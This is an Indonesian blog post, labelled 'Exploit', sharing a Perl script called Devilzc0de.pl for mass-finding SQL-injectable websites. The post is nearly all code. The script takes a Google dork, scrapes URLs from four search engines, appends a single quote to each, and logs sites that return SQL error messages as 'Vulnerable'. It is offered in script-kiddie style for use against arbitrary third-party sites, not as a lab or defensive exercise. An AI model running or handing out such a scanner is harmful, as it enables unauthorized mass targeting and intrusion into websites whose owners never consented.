script scanner bugs
Label:
:Exploit
hai guy's,yang hobbi banget maenan bug's pasti kenal yang namanya google dork..itu lhoo..dork buat nyari bug's dengan cepat,tapi kadang kendalanya kita harus cek satu2 web tersebut..kelamaan deh :( ni kemarin jalan2 nemu scanner yang yahud menurut ane,tapi syaratnya harus terinstall Active perl < versi berapa aja>...
#!/usr/bin/perl
system('clear','cls');
print "\t=============================================================\n";
print "\t= Devilzc0de.pl ver.1.1 =\n";
print "\t= Advanced SQLi Target Scanner =\n";
print "\t= Catching your target =\n";
print "\t= With 4 search engine =\n";
print "\t= programmer: gunslinger_ =\n";
print "\t=============================================================\n";
print "\n\n";;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
#devilzc0de crew
print q{
};
print "Please input your dork : ";
chomp ($kiddies=<STDIN>);
print "\n";
print "Name file of Searching result : ";
chomp ($peti=<STDIN>);
print "\n\n";
if ($kiddies=~ /(.*)/){
system('clear','cls');
print "\n";
print "\t=============================================================\n";
print "\t= Searching... =\n";
print "\t=============================================================\n";
print "\n";;
my $flyff666=$1;
# Starting The Search Engine
my @mlist=&ugds($flyff666);
sub ugds(){
my @lst;
for($spykit=1;$spykit<=1000;$spykit+=1){
#------------------------------------------------------------------------------------------------------------------------
my $wisdom=LWP::UserAgent->new;
$wisdom->agent("");
$wisdom->timeout(30);
#-------------------------------------------------------keep rock guns---------------------------------------------------
my $Doslive=("http://search.live.com/results.aspx?q=".$flyff666."&first=".$spykit."&FORM=PERE");
my $Google=("http://www.google.com/search?q=".$flyff666."&hl=en&start=".$spykit."&sa=N");
my $Gs=("http://www.goodsearch.com/search.aspx?keywords=".$flyff666."&page=".$spykit."&osmax=0");
my $Busca=("http://mundo.busca.uol.com.br/buscar.html?ref=homeuol&ad=on&y=0&q=".$flyff666."&x=0&start=".$spykit."");
#-------------------------------------------------------------------------------------------------------------------------
@array=($Doslive,$Google,$Gs,$Busca);
foreach $scanner(@array){
my $g0nzhack=$wisdom->get($scanner);
$g0nzhack->as_string;
my $Res=$g0nzhack->content;
#-------------------------------------------------------------------------------------------------------------------------
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)/g){
if($1 !~ /msn|live|microsoft|WindowsLiveTranslator|youtube|google|cache|74.125.153.132|q=|Timeout|Network|Failed|403|404|Antivirus|download|busca|goodsearch|uol/)
{
$gunslinger=$1;
$gunslinger=~s/&(.*)/\ /g;
if($gunslinger !~ /http:\/\//){
$link = "http://$gunslinger";
}
$petik="%27";
$url = $link.$petik;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success &&
$response->content =~ /You have an error in your SQL/ ||
$response->content =~ /Division by zero in/ ||
$response->content =~ /supplied argument is not a valid MySQL result resource in/ ||
$response->content =~ /Call to a member function/||
$response->content =~ /Microsoft JET Database/ ||
$response->content =~ /Microsoft OLE DB Provider for SQL Server/ ||
$response->content =~ /Unclosed quotation mark/ ||
$response->content =~ /Microsoft OLE DB Provider for Oracle/ ||
$response->content =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ ||
$response->content =~ /Incorrect syntax near/ ||
$response->content =~ /different number of column/ ||
$response->content =~ /err!/ ||
$response->content =~ /Warning: mysql_fetch_assoc()/ ||
$response->content =~ /Microsoft OLE DB Provider for ODBC Drivers/ ||
$response->content =~ /query/ ||
$response->content =~ /Query/ ||
$response->content =~ /getimagesize()/ ||
$response->content =~ /mysql_fetch_assoc()/ ||
$response->content =~ /mysql_fetch_array/ ||
$response->content =~ /mysql_num_rows()/ ||
$response->content =~ /session_start()/ ||
$response->content =~ /getimagesize()/ ||
$response->content =~ /is_writable()/ ||
$response->content =~ /Unknown()/ ||
$response->content =~ /session_start()/ ||
$response->content =~ /mysql_result()/ ||
$response->content =~ /pg_exec()/ ||
$response->content =~ /array_merge()/ ||
$response->content =~ /filesize()/ ||
$response->content =~ /preg_match()/ )
{
$msg = "[+]Vulnerable ! (Sql Injection)";
print "Target : $url \n";
print "Gathering vulnerability information...\n";
print "->$msg\n";
print "\n";
open(FILE,">>$peti");
print FILE "target : $url \n";
print FILE "Gathering vulnerability information...\n";
print FILE "->$msg\n";
print "\n";
close(FILE);
}}}
}}}}
print "\n====================================================";
print "\n Press Enter to continue... =";
print "\n Press Ctrl + C to exit... =";
print "\n====================================================\n";
<STDIN>;
system("$0")
Diposting oleh j0ck3r di 23.38
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar